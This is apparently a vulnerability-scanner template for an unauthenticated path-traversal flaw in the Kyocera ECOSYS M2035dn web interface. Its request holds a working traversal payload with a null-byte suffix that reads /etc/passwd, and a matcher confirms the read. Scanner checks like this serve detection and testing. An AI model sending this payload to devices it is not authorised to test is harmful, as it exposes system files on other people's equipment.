id: kyocera-m2035dn-lfi

info:
  name: Kyocera Command Center RX ECOSYS M2035dn - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Kyocera Command Center RX ECOSYS M2035dn is vulnerable to unauthenticated local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/50738
    - https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: edb,printer,iot,kyocera,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/js/../../../../../../../../etc/passwd%00.jpg"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/03
